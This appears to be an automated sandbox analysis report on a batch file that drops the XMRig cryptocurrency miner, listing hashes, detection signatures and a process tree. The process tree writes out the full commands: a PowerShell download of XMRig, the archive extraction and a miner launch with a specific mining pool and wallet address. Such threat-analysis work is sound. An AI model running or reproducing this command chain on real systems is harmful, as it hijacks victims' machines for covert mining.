Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Resubmissions
Analysis
-
max time kernel
1794s -
max time network
1810s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
24-01-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20231215-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20231215-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20231215-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20231215-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20231215-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20231215-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20231215-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20231215-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20231215-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20231215-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20231215-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20231215-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20231215-en
General
-
Target
tesy - Copy (12).bat
-
Size
608B
-
MD5
727c8da0478af118c957ae60f7161cab
-
SHA1
cf18105b8659e93bbd2824fa35ef1bae7b395301
-
SHA256
97db0437ecb6f401a4674dceead7b17a885241f2ab2495652863d2240f3bedab
-
SHA512
d9cbb46d5f3caa92d3b44301bc96ccfd5552f2ab3e5460362db3b59d23e0a5c34bf78e9387009092ac5c92b4423c03789aa1fc824a4e1388a1363daa6ab54e01
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip
Signatures
-
XMRig Miner payload 64 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe family_xmrig C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe xmrig behavioral3/memory/4488-118-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-121-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-122-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-123-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-126-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-127-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-128-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-129-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-130-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-131-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-132-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-133-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-134-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-135-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-136-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-137-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-138-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-139-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-140-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-141-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-142-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-143-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-144-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-145-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-146-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-147-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-148-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-149-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-150-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-151-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-152-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-153-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-154-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-155-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-156-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-157-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-158-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-159-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-160-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-161-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-162-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-163-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-164-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-165-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-166-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-167-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-168-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-169-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-170-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-171-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-172-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-173-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-174-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-175-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-176-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-177-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-178-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-179-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-180-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-181-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-182-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig behavioral3/memory/4488-183-0x00007FF7D9410000-0x00007FF7D9F13000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 2 316 powershell.exe 5 316 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
xmrig.exepid process 4488 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 316 powershell.exe 316 powershell.exe 316 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 632 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exexmrig.exedescription pid process Token: SeDebugPrivilege 316 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeLockMemoryPrivilege 4488 xmrig.exe Token: SeLockMemoryPrivilege 4488 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
xmrig.exepid process 4488 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2564 wrote to memory of 316 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 316 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 3892 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 3892 2564 cmd.exe powershell.exe PID 2564 wrote to memory of 4488 2564 cmd.exe xmrig.exe PID 2564 wrote to memory of 4488 2564 cmd.exe xmrig.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (12).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-gcc-win64.zip', 'xmrig-6.21.0-gcc-win64.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:316 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.0-gcc-win64.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3892 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exexmrig.exe --url pool.hashvault.pro:80 --user 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ --pass tria2 --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b142⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4488
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5a6cb8dec7cb20c6227f9e6b8658f2523
SHA165322fa96a2f7a6490857c6cfbf3245efcde4162
SHA2561a6d460510aa0f35a285262e58fe1d98fa5bcd83c85305d5909483771a858601
SHA512db039740c31b0c620919a636410dff38944a28a0ff509f0cdca36ee3bce1ab07b6d1b6dd4d5df93971a9431150e2219c6fcf0c46b1e23ff2f4dff06c6866067d
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
478KB
MD5f9df6ecd7c3f47bf231b584a0b749e60
SHA1a126abd2a104556a4f0985ed1eb71af314fb9cd7
SHA256a598bcf8a475e93521a9e177eb6a0167524d9b6d98583354bc0b24e7d0fcec04
SHA51234cc4771ea6bee814a6763551c8ece3cd7f0535f83d92e08b8bb413b21d01d0081633de82e4a02789753b909be8a90186e8cb699ad45ae8b37fa41f88f92ec10
-
Filesize
231KB
MD5a4cd69018407f26d99a288d3824b527f
SHA16b9ef0c6055971fcb2190fb95ead4e1f012b1430
SHA2568f81eb0b6720af61d09f318735b4d16541506df9d5e45b03e94cf3fff7f5b0a3
SHA51230adbd8afd0fe0c4821b7d4b1b2717e7bf2d0eb509d2d0299a6eca550a717279730a39f8369c4e463b68d0f061e6895d3e2b75a44caec63f6c61456ae11c0f72